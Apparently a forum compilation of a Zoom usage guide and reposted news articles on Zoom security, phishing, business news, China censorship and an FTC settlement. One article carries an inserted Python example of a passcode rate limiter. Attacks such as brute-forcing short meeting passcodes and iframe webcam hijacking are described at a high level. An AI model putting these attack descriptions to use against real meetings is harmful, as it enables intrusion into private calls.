If you have a Pro, Business, or Enterprise plan, you can take advantage of the webinars option. Webinars can be set up that broadcast to up to 10,000 view-only attendees at a time. Screens, video, and audio can be shared; chat sessions between attendees and panelists can be hosted, and webinars can be run on either a pre-registration or open basis.

VIRTUAL BACKGROUNDS
Virtual backgrounds can be used to hide the chaos and clutter of your home. There are specific hardware requirements, which can be accessed here. Most modern PC setups should be able to manage -- but the virtual background works best with a green screen and uniform lighting. To set up a virtual background, go to the desktop app, "Settings," and choose "Virtual Background." You will be prompted to download a virtual background package -- just once -- and then you can try out different screens or add your own image/video instead. You may see a warning that says your hardware isn't good enough -- but give it a go, anyway. Once you've enabled and selected a virtual background, while in a meeting, you can toggle them off/on next to the "Stop Video" tab.

WHITEBOARDS
Earlier, we mentioned the "whiteboard" option under the "Share Screen" tab. This is a useful option if you are canvassing ideas or soliciting feedback and it comes with different annotation options, including text boxes, arrows, and more. The "spotlight" is a form of highlighter which can be used to bring user attention to a particular area or point.

WHAT ABOUT ZOOM GATECRASHERS?
When software is popular, scammers come out of the woodwork to try and find a way to capitalize.
Zoom is no different; the appearance of scammers jumping into unprotected meetings and posting malicious links and pornography has given rise to the phrase "Zoom-bombing." The problem has become common enough for Zoom to publish a guide on how to prevent gatecrashers from disrupting your meetings, including pointers such as:
  • Keep your meeting links off social media
  • Choose "only host" for screen sharing control during a meeting
  • Only allow signed-in users to join a meeting
  • Use the "lock" feature to prevent random users from joining in.
You might also want to consider using the Waiting Room. If you are gatecrashed, hover over the user's name in the Participants menu to bring up a "remove" option.

ZOOM SECURITY
Since the video conferencing software's popularity exploded due to COVID-19, the vendor has been working on improving the security of the software, together with the help of researchers and security experts. The company has introduced a range of new measures, including:
  • Permitting meeting hosts to configure minimum meeting password requirements
  • Changing the 9-digit setup for randomly-generated meeting IDs to 10 or 11 digits
  • Removing Facebook's iOS SDK client to stop unnecessary data collection
  • Implementing new ways to deal with gatecrashers
  • Resolving vulnerabilities in the Zoom installer and Windows client
  • Using personal meeting IDs (PMIs) can now be disabled
  • Showing profile pictures can be disabled
  • An expiration date for cloud recordings can be set, as well as whether or not they can be shared

ZOOM PLUGINS AND INTEGRATIONS
To extend the video platform's functionality, Zoom offers a variety of plugins and extensions to make meeting scheduling and joining more convenient. At present, there is a Microsoft Outlook extension, Chrome browser extension, Mozilla Firefox add-on, Skype for Business plugin, and IBM Notes plugin available.
The guides for each are below:
  • Microsoft Outlook plugin, add-in
  • Chrome extension
  • Firefox add-on
  • Skype for Business
  • IBM Notes
  • Slack: Zoom integration with Slack is also possible for subscribers. The app can be downloaded here.

ZOOM ROOMS
Zoom Rooms is a more advanced software offering available as a $49 per month subscription. (There is also a 30-day free trial.) Zoom Rooms, an option for business owners, combines audio conferencing, video conferencing, and wireless screen sharing. A PC running Zoom Rooms is the bare minimum requirement, but iPads, TV displays, and external speakers, cameras, and microphones can all be integrated within one room. You can find the Rooms client and controller software (iOS, Android, or Windows) in the Zoom Download Center.

ADDITIONAL POINTS
  • When screen sharing, the "optimize option" is especially useful when sharing YouTube and other online videos as it can prevent distortion, lagging, and buffering issues.
  • Hot Keys and keyboard shortcuts are available for Mac and Windows machines. A full list can be found here.
  • Meeting times: If you are experiencing connection issues at peak times, consider scheduling a meeting at times other than on-the-hour or on a half-hour.
  • Need training for specific purposes, such as for education? Zoom offers over 30 live training sessions per week.
  • If you need additional technical support, Zoom has an online help center.

ZOOM'S BEST PRACTICES
  • Double-check meeting default settings
  • Test your audio and video as you join
  • Use a USB-connected headset
  • Mute your microphone when not speaking
  • Position your webcam properly
  • If hosting, connect from a large screen
  • For best results, use the app and not a browser
  • Use a stable/wired connection
  • Join meetings in quiet areas

Source: The complete Zoom guide: From basic help to advanced tricks
  10. Zoom may launch an email service and calendar app to compete with Google and Microsoft The company is exploring products beyond videoconferencing Videoconferencing platform Zoom has had a blockbuster year, with its stock price rising more than 500 percent due to the unprecedented surge in remote work brought on by the coronavirus pandemic. But now the company is looking to expand beyond workplace video chat and into new territories, specifically email and calendar services, according to a new report from The Information. The company is already working on the email product, which the report states will be a web email service Zoom may begin testing as early as next year. The calendar app appears farther off and it’s unclear if development has even started. But both ideas are smart avenues for Zoom to explore, especially if companies start bringing employees back to the office and reliance on videoconferencing declines as COVID-19 vaccine distribution picks up through 2021. Zoom declined to comment for this story. Many of Zoom’s major competitors are videoconferencing platforms bundled as part of broader enterprise app suites, with the two biggest ones belonging to Microsoft with its Office 365 platform and Google with its competing Workspace bundle. Both of those platforms offer calendar, email, and videoconferencing products, so it makes sense Zoom would look to email and calendar to try to round out its offerings and make Zoom less of a single-purpose platform. The Information’s report has a number of other telling signs the company is interested in building a full enterprise app suite, including job postings for “exciting chat features” and its existing integrations with other apps like Asana and Dropbox. But there is always the possibility the company decides to wait and see how the shift back to office work affects businesses and whether remote work remains a prominent factor of life well into the future.
Update December 23rd, 2:58PM ET: Noted that Zoom declined to comment. Zoom may launch an email service and calendar app to compete with Google and Microsoft
  11. The Better Business Bureau warns of phishing messages with the Zoom logo that tell recipients they have a missed meeting or suspended account. A new Zoom-themed phishing attack is circulating through email, text and social media messages, aiming to steal credentials for the videoconferencing service. The Better Business Bureau (BBB) warned last week that the attack uses Zoom’s logo, and in a message tells recipients that their Zoom accounts were suspended and to click a link to reactivate; or that they missed a Zoom meeting, and to click a link to see the details and reschedule. Another recent variant of the attack has been a message welcoming some recipients to the platform and requesting they click on a link to activate the account, said the BBB. In all cases, victims are taken to a phishing landing page, where they are asked to input their Zoom credentials. “This [phishing scam] isn’t surprising, since attackers always update their phishing lures to take advantage of ongoing trends and events,” said Stu Sjouwerman with KnowBe4, on Tuesday. According to the BBB, scammers registered more than 2,449 Zoom-related domains from late April to early May. Cybercriminals and scammers are utilizing these domain names, which include the word “Zoom,” to send emails that look like they are coming from the official videoconferencing service. “No matter what kind of phishing message you receive, scammers hope you will click on the link they’ve included in their email,” according to the BBB. “These links can download malware onto your computer or lead you to a page where you are prompted to enter your login information. Entering your username and password gives scammers access to your account and any other account that uses a similar login and password combination.” The phishing scam comes amidst the wave of remote workers driven home by the coronavirus pandemic, who have come to rely on online collaboration tools like Zoom and other platforms.
BBB said, with Zoom’s usage exponentially growing in 2020, these credentials are invaluable for attackers. For instance, a database shared on an underground forum in April contained more than 2,300 compromised Zoom credentials. “Naturally, this has attracted the attention of hackers and scammers,” said the BBB. “With a huge user base to target, con artists are using old tricks in new scams to try to steal your information.” Compromised Zoom credentials could give cybercriminals access to web conference calls, where sensitive files, intellectual property data and financial information are shared. Cybercriminals can also use these credentials for social-engineering purposes — ultimately leading to attacks like business email compromise efforts. Attackers can also use these types of compromised credentials to launch denial-of-service attacks, also known as “Zoom bombing.” Despite the FBI cracking down on Zoom-bombing earlier this year, the practice continues to plague Zoom users, with a recent Thanksgiving Zoom-bombing attack that was labeled “TurkeyBombing.” Potential victims can protect themselves from these types of scams by double-checking the sender’s information – as Zoom.com and Zoom.us are the only official domains for Zoom, said the BBB. Also, recipients should never click on links in unsolicited emails, they said. “Phishing scams always involve getting an unsuspecting individual to click on a link or file sent in an email that will download dangerous malware onto their computer,” they said. “If you get an unsolicited email and you aren’t sure who it really came from, never click on any links, files, or images it may contain.” Source
  12. The tech stock is getting slammed as successful coronavirus vaccine trials have investors speculating about a return to more face-to-face interaction in 2021 and beyond. What happened Shares of videoconferencing specialist Zoom Video Communications (NASDAQ:ZM) are slumping today. The decline comes in the wake of news that a COVID-19 vaccine from Pfizer and BioNTech prevented over 90% of infections in human trials including tens of thousands of volunteers. Additionally, no serious safety concerns have been identified. Some investors are betting stocks that benefited from people sheltering at home could now cool off if lockdowns ease amid a successful deployment of vaccines. So what Zoom was one of the biggest beneficiaries as consumers and workers sheltered at home. People turned to the platform to collaborate virtually, leading to skyrocketing revenue and profitability. For the three-month period ending July 31, Zoom announced a 355% year-over-year increase in revenue. On $664.5 million of revenue, the company raked in $373.4 million of free cash flow. This was up from free cash flow of $17.1 million in the year-ago quarter. Given the growth stock has soared more than 500% this year, it's not surprising to see shares selling off some as investors speculate about a return to more normalcy in 2021 and beyond. Now what Management said in its third-quarter update that it anticipated even greater fiscal fourth-quarter revenue. The company guided for record revenue between $730 million and $750 million during the period. While a slowdown in Zoom's growth story should be expected as the economy reopens, it's unclear both how quickly vaccines can be rolled out to the masses and by how much the company's growth will slow. Before the pandemic, Zoom was already notably expanding at near-triple-digit growth rates. Source
  13. BEIJING (Reuters) - Zoom Video Communications (ZM.O) has gained a following in China in recent months from users ranging from underground churches to feminists who saw it as a rare way to connect with the world beyond the reach of state censors. Some fear that window may be closing. On Friday, Zoom said it had suspended accounts of three U.S. and Hong Kong activists at Beijing’s request after they tried to commemorate the anniversary of the Tiananmen Square crackdown, but that they had since been reactivated. The U.S. company also said it was developing technology to enable it to remove or block participants based on geography. The Chinese government heavily regulates the internet, in a system widely dubbed the Great Firewall, saying this is needed to maintain social stability. All Chinese social media platforms are required to censor public posts deemed illegal. “For us, the biggest challenge has been how to reach people within China because of the firewall, and Zoom for a while looked like a ray of hope,” said U.S.-based Humanitarian China founder Zhou Fengsuo, whose account was suspended. The conferencing tool, originally designed for business use, saw Chinese user numbers surge in tandem with its global popularity amid the COVID-19 pandemic, a rare feat given how Western peers such as WhatsApp, Google Meet and Facebook are blocked in China’s cyberspace. Zoom’s mobile app has been downloaded 5.4 million times from Apple’s China store since Jan. 1, 11 times the number over the same period in 2019, according to research firm SensorTower. While most Chinese users turn to Zoom for conference calls and casual chats, some have seized the chance to discuss potentially sensitive topics, from patriotism to feminism. Some state-approved and underground churches use Zoom to hold services. “Zoom is not the only software, but we feel it’s rather more accessible,” said Xiao Meili, a feminist activist who held a Zoom talk in April on the #MeToo movement. 
“Before, some friends recommended Tencent conference ... but everyone would feel like you shouldn’t say anything that’s slightly sensitive,” she said, referring to a tool offered by the Chinese tech giant behind WeChat. INSIDE THE FIREWALL In March, Youth Lectures kicked off a series of Zoom talks, the first of which was led by Chinese University of Hong Kong professor Chow Po Chung, on freedom of speech in China. Chow’s mainland China account on the Twitter-like platform Weibo has been deleted multiple times. Other anonymous groups hosted lectures from a #MeToo activist and a gender-activist on their work in mid-May. New York-based Lu Pin, whose influential Feminist Voices accounts on Weibo and WeChat were shut by authorities in 2018, said Zoom was a way to connect a Chinese audience to the outside world. “You don’t have to climb the firewall, people in China and outside of China both can connect to it,” she said. There are few alternatives, she said. “This is not a multiple-choice question. If you’re a Chinese person, if you don’t use this, what will you use?” Zoom’s China users had already been subject to new constraints since last month when the company announced that free users would no longer be able to host meetings, and new registrations were limited to some enterprises. Source
  14. RingCentral and Zhumu are now patched Apple informed us that it has sent out a silent security update to Macs to remove software that was automatically installed by RingCentral and Zhumu. These video conferencing apps both used technology from Zoom — they’re essentially white labels — and thus they also had Zoom’s security flaws. Specifically, they installed secondary pieces of software that could take commands from websites to open up your webcam in a video conference without your intervention. Even uninstalling those apps wouldn’t remove that secondary web server, which would mean that many users wouldn’t get the software vendors’ updates fixing the issue. That means Apple is best positioned to remove the offending software, and it is. Apple intends to fix the issue for all of Zoom’s partner apps. Yesterday, these additional issues arose from further research into Zoom’s partner apps, but the larger problem of Zoom installing a secondary web server that could potentially be insecure began with a zero-day disclosure on July 8th. Since then, Zoom itself has been scrambling to come to the right solution for users — including an about-face on whether such an update was even necessary in the first place. It ultimately decided that it was worth the update, but couldn’t remove software for users that had uninstalled its main app, which is why Apple had to step in. Apple issued its first silent patch to remove Zoom’s extra software on July 10th, and today’s update is essentially part of the same mitigation. The core issue stems from a change Zoom made to its video conferencing software to work around a security update Apple had made to Safari. Safari was recently updated in such a way that it required user approval to open up a third-party app, every time, and Zoom wanted to keep users from having to deal with that extra click. That required installing a web server that listened for calls to open up Zoom conferences. 
Combine that with the fact that it was common and easy for Zoom users to have their default set to have video on when joining a call, and it became possible for a malicious website with an iframe to open up a video call on your Mac with the camera on. Source
  15. Microsoft’s Skype struggles have created a Zoom moment Skype is missing out to Zoom and others during the coronavirus pandemic If the coronavirus pandemic had swept across the world in 2011, everyone would have been using Skype to connect over video and voice calls. Instead, rivals like Zoom and Houseparty are having a moment of huge growth in 2020 thanks to consumers looking for Skype alternatives. In recent weeks we’ve seen people across the world sheltering at home and holding virtual yoga classes, beers with friends, and even school classes all over Zoom. It’s a unique once in a decade situation that’s highlighted Microsoft’s beleaguered Skype acquisition in a big way. Microsoft originally acquired Skype for $8.5 billion back in 2011. It was the same year that Zoom and Snapchat were founded, and Apple launched its iPhone 4. Skype had more than 100 million active users back then, and 8 million of those were paying to use the service to make and receive calls using the voice over internet protocol (VoIP). Skype was the main way consumers actually talked to each other over the internet, with video calls making up 40 percent of all Skype usage back in 2011. Skype had become so big that in 2011 The Onion joked that “Skype” would be added to the dictionary. Three years later, the verb was added to the Oxford English Dictionary, highlighting how popular the service had become. But Microsoft faced some big challenges early on to transform Skype into a profitable business and keep it relevant for consumers. Microsoft’s Skype acquisition came just as chat apps like WhatsApp, Messenger, Snapchat, and WeChat were starting to gain momentum and challenge Skype’s dominance. Surprisingly, Microsoft opted to ditch its own popular Windows Live Messenger service in favor of Skype to try and ward off competition. Microsoft had one big problem to solve early on, though.
The company had acquired a service that was based on peer-to-peer (P2P) technology, which made it less efficient on mobile devices. This is where a lot of Microsoft’s Skype problems began. Microsoft transitioned Skype from these P2P networks to cloud-powered servers back in 2013, in order to capitalize on Skype integration on Windows Phone and improve its mobile apps in general. Skype also became the default messaging app for Windows 8.1 back in 2013, and even shipped as part of Microsoft’s big Kinect push for the Xbox One console in the same year. Skype also appeared on the web as part of Outlook.com in 2013. All of this was powered by Microsoft’s transition away from Skype’s traditional P2P networks, but it was messy. [Image: Skype on Windows Phone.] The transition lasted years, and resulted in calls, messages, and notifications repeating on multiple devices. Skype became unreliable, at a time when rivals were continuing to offer solid alternatives that incorporated messaging functionality that actually worked and synced across devices. Instead of quickly fixing the underlying issues, Microsoft spent years trying to redesign Skype. This led to a lethal combination of an unreliable product with a user experience that changed on a monthly basis. I wrote back in 2016 that Microsoft needed to fix Skype, instead of adding in useless emoji and launching and abandoning its Qik video messaging app. Microsoft didn’t really listen, though. The company went in a completely different direction with Skype in 2017, with a design that turned the app into something that looked like Snapchat. Unsurprisingly, people weren’t happy with the design and Microsoft was forced to kill off the Snapchat-like features and redesign Skype once again a year later. During this time, Microsoft also pushed Skype for Business as the replacement for its Lync (Office Communicator) enterprise instant messaging software.
Skype looked like it would power the future of Microsoft’s chat services across consumers and businesses, until Microsoft Teams arrived in 2016. Teams has quickly become Microsoft’s focus for chat and communications in recent years. The company has been aggressively pushing businesses to adopt Teams, at a time when rivals like Slack are trying to win big businesses over. Microsoft Teams isn’t just for businesses anymore, either. Just this week, Microsoft announced its Teams plan for consumers. It’s part of a bigger push for Microsoft 365 subscriptions to families and consumers. Microsoft is trying to convince consumers that Teams can be used to connect to friends and family in a group chat or through video calls, and share to-do lists, photos, and other content all in one location. Microsoft thinks people who plan trips with friends or organize book clubs and social gatherings will be interested in Teams. This Teams push has taken the spotlight off Skype in recent years, though. Microsoft has used the underlying technology it has with Skype to power its video and voice calls in Teams, while rewriting the chat and messaging experience that the company struggled to get right with Skype’s Messenger transition. All of this has now led Microsoft to throw its weight behind Teams, even for consumers. Skype isn’t likely to go away anytime soon, but it’s not Microsoft’s focus anymore. “For now, Skype will remain a great option for customers who love it and want to connect with basic chat and video calling capabilities,” says a Microsoft spokesperson in a statement to VentureBeat. “With the new features in the Microsoft Teams mobile app, we see Teams as an all in one hub for your work and life that integrates chat, video calling, [and the] ability to assign and share tasks, store and share important data with your group, [and] share your location with family and friends, whereas Skype is predominantly a chat and a video calling app platform. 
We have nothing more to share.” Microsoft said in 2015 that Skype had 300 million active monthly users. The company hasn’t updated those numbers in the tumultuous period that followed. We still don’t know exactly how many people are using Skype, but Microsoft did provide some hints this week. During a press briefing, Microsoft revealed Skype is used by 200 million people, an active user count that’s based over a period of six months and not a monthly active user count. During the coronavirus pandemic, this usage has increased to 40 million people using Skype daily, up 70 percent month-over-month. That suggests that around 23 million people were using Skype daily, before the increase in demand. Microsoft is refusing to provide monthly active user counts for Skype, most likely because the company doesn’t want any obvious comparisons to competitors or the 300 million it previously revealed in 2015 when the service was still growing. 40 million daily users is still a big number, even when chat apps like WhatsApp have since passed 2 billion users, and Telegram has exceeded 200 million monthly active users. The real question is how are rivals like Zoom, Houseparty, and even Google’s Hangouts growing during this ongoing coronavirus pandemic? Houseparty and Zoom have both exploded in growth in the UK and US. Zoom currently sits at the top of the US App Store list, and second position in the UK App Store list. Houseparty is at the top in the UK, and number three in the US. Skype sits at number 75 in the US, and number 15 in the UK. Microsoft isn’t totally losing out here though, the company’s Teams mobile app is number seven in the US and number six in the UK. “Zoom does not share any numbers around users / usage, signups, or total number of customers,” says a Zoom spokesperson in a statement to The Verge. 
So it’s impossible to know the true number of Zoom users right now. Some estimates suggest Zoom had close to 13 million monthly active users last month, before consumers and businesses turned to the service in large numbers. One of the many reasons consumers are flocking to Zoom and Houseparty is that they’re easy to use. Zoom users don’t need an account, it’s free to use for up to 40 minutes, and you can join meetings with just a simple link or code. Skype offers a way to create video meetings with no sign ups or downloads, but you probably didn’t even know this feature existed. Instead, Zoom’s simple app approach has won people over. That ease of use has led to criticism over Zoom privacy, and the phenomenon of “Zoombombing,” where an uninvited guest uses Zoom’s screen-sharing feature to broadcast shock videos. Houseparty is equally easy to use, but it’s facing hacking rumors that the company is strenuously denying. Houseparty says it’s “investigating indications that the recent hacking rumors were spread by a paid commercial smear campaign to harm Houseparty.” The firm is even offering to pay out $1 million to “the first individual to provide proof of such a campaign.” Even if Zoom and Houseparty won’t provide actual user numbers, it’s clear from the many stories of people using the services and anecdotal evidence that there’s some serious growth going on here. A recent App Annie report shows that Houseparty, Google Hangouts, Microsoft Teams, and Zoom are all seeing phenomenal growth for different reasons. Skype is still being used by broadcasters and in many locations worldwide, but a lot of people are turning elsewhere for video calls. There are many reasons for Skype missing out on this key mindshare moment, but Microsoft’s missteps with Skype’s reliability and user interface are surely to blame. This is highlighted best with Skype for Windows. After years of struggling to decide between touch-friendly (Universal Windows Platform) vs. 
traditional desktop Skype, Microsoft is now reversing course on its Skype for Windows plans. Skype will soon migrate to an Electron-powered app, instead of UWP. It acts far more like a traditional desktop app now. “For users of the UWP app, it’s a background upgrade and we migrate your credentials, similar to what happens when updating an app on a mobile device,” says a Skype spokesperson in a statement to The Verge. “Customers will see the same Skype UI but they may see different functionality since Electron has more features than UWP.” This, alongside the Teams focus, are early signs of where Skype will end up. Microsoft wasn’t afraid of ditching the 100 million people using Windows Live Messenger years ago, and I wouldn’t be surprised to see the company try and push Skype users over to Teams in the months ahead. Like Microsoft said, “For now, Skype will remain a great option for customers who love it and want to connect with basic chat and video calling capabilities.” The “for now” part of that statement is a telling sign that Microsoft’s focus is now Teams, not Skype. Correction: Skype had around 23 million daily active users before the coronavirus pandemic, not 12 million as previously stated. We regret the error. Source: Microsoft’s Skype struggles have created a Zoom moment (The Verge)
  16. Karlston

    Why Zoom became so popular

    Its selling points also introduce privacy and security risks Seemingly everyone knows about Zoom now: parents, co-workers, friends, grandparents, and neighbors. The videoconferencing software company that went public last year is having a moment during the pandemic. People have flocked to the service to keep up with friends, build digital clubs, and even host weddings. However, in this time of immense growth, researchers and journalists have scrutinized the app and found multiple security and privacy risks. People are realizing the free app might actually come with the cost of giving up their personal data. The app’s main selling point, at least to the broader consumer world, is that it offers free, 40-minute conference calls with up to 100 attendees. It’s easy to use — people don’t need a login to access a meeting — and the interface is relatively intuitive. However, those same features put people at risk. Zoombombing, for one, has taken advantage of Zoom’s system of randomly generated ID access codes and lack of required passwords to join a call. People drop into Zoom calls that aren’t their own and broadcast offensive material, like pornography. One automated tool developed by security researchers can find around 100 Zoom meeting IDs in an hour and information for nearly 2,400 Zoom meetings in a single day of scans, just as an example of how easy it can be to find meetings to join. Zoom says passwords have been enabled by default since late last year, but many people still aren’t using them. That’s not the only risk with Zoom. The company also has an issue with its “Company Directory” setting that could leak user emails and photos, and Zoom confirmed to The Intercept that video calls on the app aren’t end-to-end encrypted like the company claims. The company has since announced a 90-day freeze on releasing new features and will focus on fixing privacy and security issues, it says. 
People continue to use Zoom because it’s easy and free, but its competitors are making moves to catch up. There are a host of alternatives, and multiple services have made certain features free or upped the number of people who can join a call. Zoom’s found massive success during a dark time for the world, and it’ll try to maintain that position, although doing so will require prioritizing user privacy and security over ease of use. Source: Why Zoom became so popular (The Verge)
  17. Zoom bug gave hackers access to any private meeting Zoom was forced to amend password policies A simple vulnerability found in the web client of video conferencing platform Zoom could have allowed hackers to listen in on any private meeting of their choosing. Identified by Tom Anthony, VP Product at SEO firm SearchPilot, the Zoom vulnerability stemmed from the absence of rate limiting on private meeting log in attempts. As Anthony explains in a recent blog post, Zoom meetings used to be protected by a 6-digit numeric password, making for a maximum of one million different permutations. This might sound like a considerable number but, using a simple Python program, a hacker could easily trial all possible passwords and brute force their way into any meeting in minutes. Meetings set to take place at regular intervals were particularly vulnerable to attack, since the password remains the same for each batch-scheduled meeting. Zoom security Zoom has experienced a sharp uptick in user numbers in recent months and currently serves over 300 million daily meeting participants. Having rocketed into public consciousness as a result of coronavirus lockdown measures and the rise of remote working, Zoom has faced significant scrutiny where security is concerned. Since March, researchers have uncovered a litany of vulnerabilities in the service - from the opportunity for credential theft to app hijacking, malicious code injection and more - forcing the company to suspend product development for a period to focus on eliminating security bugs. After verifying the brute force exploit using a crude Python program running on an AWS machine, Anthony disclosed the vulnerability on April 1, which led to the suspension of the Zoom web client on April 2 - an outage that lasted one week. During this time, Zoom implemented policy that required web client users to log into an account before joining a meeting. 
The company also made default passwords longer and included non-numeric characters, drastically increasing the number of possible password permutations. “We have since improved rate limiting and relaunched the web client on April 9. With these fixes, the issue was fully resolved, and no user action was required. We are not aware of any instances of this exploit being used in the wild,” Zoom explained in a statement. As Anthony notes, however, it is plausible an attacker might have infiltrated a Zoom meeting by this vector without alerting the other participants, hidden behind a generic user ID such as “iPhone” or “Home PC”. Via Bleeping Computer Zoom bug gave hackers access to any private meeting
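The control the article says was missing, per-meeting rate limiting of passcode attempts, can be sketched as follows; this is an added example, not Zoom's code and not taken from the article. `PasscodeGate`, `FakeClock`, the thresholds and the sample passcodes are assumptions chosen for illustration.

```python
import hmac
import secrets
import string
import time
from collections import defaultdict, deque

ALPHABET = string.ascii_letters + string.digits  # 62 symbols vs. 10 digits


class FakeClock:
    """Manually advanced clock so the limiter can be exercised offline."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class PasscodeGate:
    """Hypothetical server-side throttle for meeting passcode attempts.

    Failures are counted per meeting, not per client address, so spreading
    guesses over many source addresses does not raise the guess budget.
    Trade-off: anyone can trigger the lock, which is one reason to require
    an authenticated account before a guess is accepted at all.
    """

    def __init__(self, max_failures=5, window=300.0, lockout=900.0,
                 clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window      # seconds over which failures are counted
        self.lockout = lockout    # seconds the meeting refuses passcode checks
        self.clock = clock
        self._failures = defaultdict(deque)  # meeting_id -> failure timestamps
        self._locked_until = {}              # meeting_id -> lock expiry time

    def check(self, meeting_id, supplied, expected):
        """Return 'ok', 'denied' (wrong passcode) or 'locked' (not evaluated)."""
        now = self.clock()
        if self._locked_until.get(meeting_id, 0.0) > now:
            return "locked"
        # Constant-time comparison so response timing leaks nothing.
        if hmac.compare_digest(supplied.encode(), expected.encode()):
            # Failures are deliberately not reset on success: a legitimate
            # join must not refill the budget for someone else's guessing.
            return "ok"
        failures = self._failures[meeting_id]
        failures.append(now)
        while failures and failures[0] <= now - self.window:
            failures.popleft()
        if len(failures) >= self.max_failures:
            self._locked_until[meeting_id] = now + self.lockout
            failures.clear()
        return "denied"


def worst_case_days(keyspace, max_failures, lockout):
    """Lower bound on days needed to try every passcode of one meeting."""
    return (keyspace / max_failures) * lockout / 86400.0


def new_passcode(length=10):
    """Default passcode drawn from letters and digits with a CSPRNG."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def replay_burst(gate, clock, meeting_id, expected, count, interval):
    """Feed `count` wrong guesses (constructed input) and tally the outcomes."""
    tally = {"ok": 0, "denied": 0, "locked": 0}
    for _ in range(count):
        tally[gate.check(meeting_id, "000000", expected)] += 1
        clock.advance(interval)
    return tally


if __name__ == "__main__":
    clock = FakeClock()
    gate = PasscodeGate(clock=clock)
    print(replay_burst(gate, clock, "meeting-1", "482913", 1000, 0.01))
    print(round(worst_case_days(10**6, 5, 900.0)), "days for 6 digits")
    print(new_passcode())
```

With these example thresholds only five of a thousand rapid guesses are evaluated, and exhausting the one million 6-digit codes would take years rather than minutes; a longer alphanumeric default, as the article describes, widens that margin further.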
  18. Zoom Finally Has End-to-End Encryption. Here's How to Use It You can lock down your meetings like never before—even if you have to give up a few features to do so. Zoom has gone from startup to verb in record time, by now the de facto video call service for work-from-home meetings and cross-country happy hours alike. But while there was already plenty you could do to keep your Zoom sessions private and secure, the startup has until now lacked the most important ingredient in a truly safe online interaction: end-to-end encryption. Here’s how to use it, now that you can, and why in many cases you may not actually want to. It’s been a long road to get here. This spring, as Zoom rode the pandemic to video call ubiquity, close observers noticed that the company was calling a feature “end-to-end encrypted” when in fact it was not. Data could be encrypted, yes, but lacked the critical “end-to-end” part, which means that no one—not Zoom, not hackers, not government snoops—can access it as it travels from one user to the other. It’s the difference between your landlord keeping a key to your apartment and being able to change the locks yourself: not the end of the world in either case, but you’d want to know for sure. Especially if you don’t trust your landlord. You likely already use end-to-end encryption in some form or another. It’s on by default for iMessage and WhatsApp, a staple of encrypted messaging platforms like Signal, and an optional feature in Facebook Messenger. For video chat, your options are more sparse. Apple offers it for up to 32 participants on FaceTime, while WhatsApp allows up to eight people at a time. Signal can manage only one-on-one encrypted calls at the moment. Suffice to say, it’s a hard thing to get right. And so Zoom went on a spending spree, bringing on high-profile consultants from the world of cryptography and buying up Keybase, a company that specializes in end-to-end encryption. 
The result of that flurry: Zoom finally delivered on its security promises at the end of October. What Zoom launched is actually a 30-day technical preview; the company will continue to refine the offering through next year. But even in its early days, it offers a significant upgrade in protection for those who need it most. A Few Limitations There are a few caveats before deciding whether you want to fully end-to-end encrypt your Zoom calls. First is that Zoom meetings are encrypted by default regardless, just not end-to-end. Which is to say, they’re likely safe enough for most people most of the time. You should absolutely flip the switch for sensitive conversations, but otherwise, as you’ll see in a minute, it may be more trouble than it’s worth in a lot of instances. Also remember that encryption isn’t magic; the people that you’re talking to could still share whatever you say. And if any of your devices are compromised, well, you’re out of luck. Turning on end-to-end encryption comes with various inconveniences. When you have it enabled, all call participants need to call in from either the Zoom desktop or mobile apps—not a browser—or a Zoom Room. (That also means no telephone participants.) Features like cloud recording, live transcription, breakout rooms, polling, one-on-one chat, and meeting reactions aren’t compatible with end-to-end encryption, and no one can join the meeting before the host does. You also need a Zoom account to enable it, which, fair enough. But while Zoom has relented on its previous stipulation that only paying customers could access end-to-end encryption, free accounts still need a valid phone number and billing option to take advantage, which Zoom has said helps prevent abuse of the feature. Turn on End-to-End Encryption So! With all of that out of the way, here’s how to actually use Zoom’s end-to-end encryption, if it’s right for you. 
It’s a little different depending on whether you’re doing so for yourself, for a group, or for all the users in an account that you administer. The good news is, the directions are the same regardless of whether you’re on iOS, Android, or the desktop client. For individual users, go ahead and sign into your account on the Zoom web portal. Click Settings in the navigation panel, then Meeting. Under Security, toggle Allow use of end-to-end encryption to on. It’ll ask you to verify your choice; click Turn On when it does. (If all of this is grayed out, your admin has disabled the feature, sorry!) Then back under Security you can choose your default encryption level. Again, what Zoom calls Enhanced Encryption is fine in most cases—you’ll still be able to make specific calls end-to-end encrypted—but go with End-to-end Encryption if you’re especially scared of snoops. If you’re the admin of a group or oversee an account with multiple users, the process is the same, but you’ll see a few additional options letting you lock everyone into the settings of your choosing. Even after all of that, remember that everyone on your call needs to have end-to-end encryption enabled for the feature to work! You can confirm that you’re locked in by looking for a green shield in the upper-left corner of the screen. And that’s it! Zoom says the next phase for its end-to-end encryption offering will include better identity management and compatibility with single sign-on services, but there’s no need to wait around for those when you can start securing your meetings today. Zoom Finally Has End-to-End Encryption. Here's How to Use It
  19. The company won't have to pay a fine for the time being. Since it exploded in popularity at the start of the coronavirus pandemic, Zoom has promised to address the more glaring security and privacy issues that are a part of its video meeting software. And now the company has a regulatory incentive to do exactly that. As part of a new proposed settlement with the Federal Trade Commission (FTC) over its privacy practices, the company must establish an information security program that will see it share security audits with the agency. Zoom has also agreed to notify the FTC if it goes through a data breach, as well as implement additional security features. The main issue the FTC had with Zoom’s practices was that it misled people about its use of end-to-end (E2E) encryption. Since as far back as 2016, the company’s website has said users could secure their Zoom meetings “with end-to-end encryption.” In reality, Zoom only recently started rolling out E2E encryption to video meetings. The FTC says the company’s claims gave people a false sense of security. The agency also found problems with ZoomOpener, software the company included in a July 2018 update it pushed to Mac users. ZoomOpener installed a persistent web server on your Mac that could, in certain circumstances, reinstall Zoom on your computer without your permission. “Zoom’s security practices didn’t line up with its promises, and this action will help to make sure that Zoom meetings and data about Zoom users are protected,” said Andrew Smith, the director of the FTC’s Bureau of Consumer Protection. “We take seriously the trust our users place in us every day, particularly as they rely on us to keep them connected through this unprecedented global crisis, and we continuously improve our security and privacy programs,” a spokesperson for Zoom told Engadget. “We are proud of the advancements we have made to our platform, and we have already addressed the issues identified by the FTC. 
Today's resolution with the FTC is in keeping with our commitment to innovating and enhancing our product as we deliver a secure video communications experience." One thing Zoom won’t have to do as part of the settlement is to pay a fine to the federal government, provided it stays out of trouble. If the FTC finds that the company hasn’t been adhering to the agreement, it faces fines of up to $43,280 for each future offense. Source
